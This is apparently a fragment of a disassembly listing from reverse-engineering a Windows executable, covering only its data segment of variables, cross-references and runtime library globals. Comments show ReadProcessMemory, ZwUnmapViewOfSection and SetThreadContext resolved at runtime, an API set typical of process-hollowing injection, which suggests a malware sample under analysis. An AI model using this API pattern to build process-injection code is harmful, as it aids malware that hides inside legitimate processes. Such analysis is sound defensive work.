sub_401613:loc_4016A7r dd 2 dup(0) dword_4082F8 dd 0 byte_4082FC db 0 ; DATA XREF: sub_4011C8+2Bw ; sub_4011C8+34w ... align 10h byte_408300 db 0 ; DATA XREF: sub_4011A3+17w ; sub_4011C8+85o ... dword_408301 dd 0 ; sub_4011C8+C4r ... align 4 dd 4 dup(0) byte_408318 db 0 ; DATA XREF: sub_4011C8+B5w align 4 dd 9 dup(0) byte_408340 db 0 ; DATA XREF: sub_4011C8+62w align 4 dd 27h dup(0) byte_4083E0 db 0 ; DATA XREF: sub_4011C8+113w align 4 dd 7 dup(0) dd 0B7AAh dup(?) dword_4362A8 dd ? ; int dword_4362AC dword_4362AC dd ? ; sub_401881+7Ar ... ; int dword_4362B0 dword_4362B0 dd ? ; WinMain(x,x,x,x)+15Er ... dword_4362B4 dd ? ; WinMain(x,x,x,x)+196r byte_4362B8 db ? ; DATA XREF: sub_401855+6w ; WinMain(x,x,x,x)+1A4w align 4 ; DWORD nNumberOfBytesToRead nNumberOfBytesToRead dd ? ; DATA XREF: sub_4011C8+25r ; sub_401881+2Ew ... 
dword_4362C0 dd ? ; sub_4016EE+74w ... dword_4362C4 dd ? ; resolved to->KERNEL32.ReadProcessMemory ; sub_405858+17w dword_4362C8 dd ? ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_405892+17w dword_4362CC dd ? ; resolved to->KERNEL32.SetThreadContext ; sub_405875+17w ; char *Str Str dd ? ; DATA XREF: start+11Cw ; __setenvp:loc_4033F2r ... align 8 dword_4362D8 dd ? dword_4362DC dd ? ; int dword_4362E0 dword_4362E0 dd ? ; _realloc:loc_404B98r ... align 10h dword_4362F0 dd ? dword_4362F4 dd ? dword_4362F8 dd ? dword_4362FC dd ? ; ___heap_select+9r ... dword_436300 dd ? dword_436304 dd ? dword_436308 dd ? align 10h ; void *dword_436310 dword_436310 dd ? ; __setenvp:loc_403491r ... align 10h dword_436320 dd ? align 8 byte_436328 db ? ; DATA XREF: _doexit+2Dw align 4 dword_43632C dd ? dword_436330 dd ? dword_436334 dd ? dword_436338 dd ? ; __XcptFilter+73w ... align 10h ; char Filename[] Filename db 104h dup(?) ; DATA XREF: __setargv+1Co byte_436444 db ? ; DATA XREF: __setargv+23w align 4 dword_436448 dd ? ; ___crtGetEnvironmentStringsA+24w ... dword_43644C dd ? ; ___crtMessageBoxA+38w ... dword_436450 dd ? ; ___crtMessageBoxA:loc_40406Er dword_436454 dd ? ; ___crtMessageBoxA+D6r dword_436458 dd ? ; ___crtMessageBoxA:loc_404029r dword_43645C dd ? ; ___crtMessageBoxA+9Cr dword_436460 dd ? ; __setmbcp+21w ... align 8 dword_436468 dd ? ; __ValidateEH3RN+13Fr ... align 10h dword_436470 dd ? ; __ValidateEH3RN+1C4r ... dd 0Fh dup(?) ; volatile LONG Target Target dd ? ; DATA XREF: __ValidateEH3RN+12Co ; __ValidateEH3RN+191o ... dword_4364B4 dd ? align 10h ; LCID dword_4364C0 dword_4364C0 dd ? ; ___crtGetStringTypeA+14Ar ... align 10h ; UINT dword_4364D0 dword_4364D0 dd ? ; ___crtLCMapStringA+9Dr ... align 8 dword_4364D8 dd ? ; ___crtLCMapStringA+31w ... dword_4364DC dd ? ; ___crtGetStringTypeA+2Ew ... ; LCID Locale Locale dd ? ; DATA XREF: _setSBCS+1Aw ; _setSBUpLow+84r ... dword_4364E4 dd ? ; __setmbcp+14Dw ... dd 6 dup(?) byte_436500 db ? 
; DATA XREF: _setSBCS+6o __setmbcp+A7o ... byte_436501 db ? ; DATA XREF: _parse_cmdline+47r ; _parse_cmdline+11Dr ... align 4 dd 40h dup(?) ; UINT CodePage CodePage dd ? ; DATA XREF: _setSBCS+10w ; _setSBUpLow+16r ... align 10h dword_436610 dd 4 dup(?) ; __setmbcp+162o ... byte_436620 db ? ; DATA XREF: _setSBUpLow:loc_4044C1w ; _setSBUpLow:loc_4044DEw ... align 4 dd 3Fh dup(?) ; UINT uNumber uNumber dd ? ; DATA XREF: __ioinit+1Fw ; __ioinit:loc_403860r ... dd 7 dup(?) dword_436740 dd ? ; __ioinit+3Cr ... dword_436744 dd 3Fh dup(?) dword_436840 dd ? dword_436844 dd ? ; _doexit:loc_402FB3r ... ; void *dword_436848 dword_436848 dd ? dword_43684C dd ? ; __setenvp+3r ... dword_436850 dd ? ; void *dword_436854 dword_436854 dd ? ; ___sbh_free_block+21Cr ... dword_436858 dd ? ; ___sbh_find_blockr ... ; LPVOID lpMem lpMem dd ? ; DATA XREF: ___sbh_heap_init+15w ; ___sbh_find_block+8r ... dword_436860 dd ? ; ___sbh_heap_init+36w ... dword_436864 dd ? ; ___sbh_free_block+300w ... dword_436868 dd ? ; ___sbh_alloc_new_region+5r ... dword_43686C dd ? ; ___sbh_free_block+249r ... ; HANDLE hHeap hHeap dd ? ; DATA XREF: __heap_alloc+38r ; __heap_init+19w ... dword_436874 dd ? ; __heap_alloc:loc_401C7Dr ... dword_436878 dd ? ; __wincmdln:loc_403394r ... align 200h _data ends end start